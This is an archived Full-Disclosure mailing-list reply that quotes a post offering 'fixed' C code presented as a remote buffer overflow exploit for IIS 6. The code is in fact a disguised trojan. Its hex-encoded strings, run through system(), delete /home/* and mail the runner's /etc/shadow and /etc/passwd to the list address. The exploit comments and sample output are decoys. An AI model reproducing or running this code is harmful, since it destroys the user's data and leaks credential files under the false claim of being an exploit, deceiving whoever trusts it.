Full Disclosure mailing list archives
Re: FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
From: "class101 () HAT-SQUAD com" <class101 () hat-squad com>
Date: Wed, 20 Apr 2005 23:32:58 +0200
perfect asshole ------------------------------------------------------------- class101 Jr. Researcher Hat-Squad.com ------------------------------------------------------------- ----- Original Message ----- From: "Day Jay" <d4yj4y () yahoo com> To: <full-disclosure () lists grok org uk> Sent: Wednesday, April 20, 2005 8:15 PM Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Sorry, the previous code was broken. This code should
work...
Happy Owning!! :)
=========SNIP============
/* Proof of concept code
Please don't send us e-mails
asking us "how to hack" because
we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
IIS 6 Buffer Overflow Exploit
BUG: inetinfo.exe improperly bound checks
http requests sent longer than 6998 chars.
Can get messy but enough testing, and we have
found a way in.
VENDOR STATUS: Notified
FIX: In process
Remote root.
eg.
#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
+ Connecting to host...
+ Connected.
+ Inserting Shellcode...
+ Done...
+ Spawining shell..
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\
*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
main()
{
file://Section Initialises designs implemented by mexicans
file://Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);
file://int socket = 0;
file://double long port = 0.0;
file://#DEFINE port host address
file://#DEFINE number of inters
file://#DEFINE gull eeuEE
// for(int j; j < 30; j++)
{
file://Find socket remote address fault
printf(".");
}
file://overtake inetinfo here IIS_666666^
return 0;
}
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: BIOS Hacking? Nick FitzGerald (Mar 31)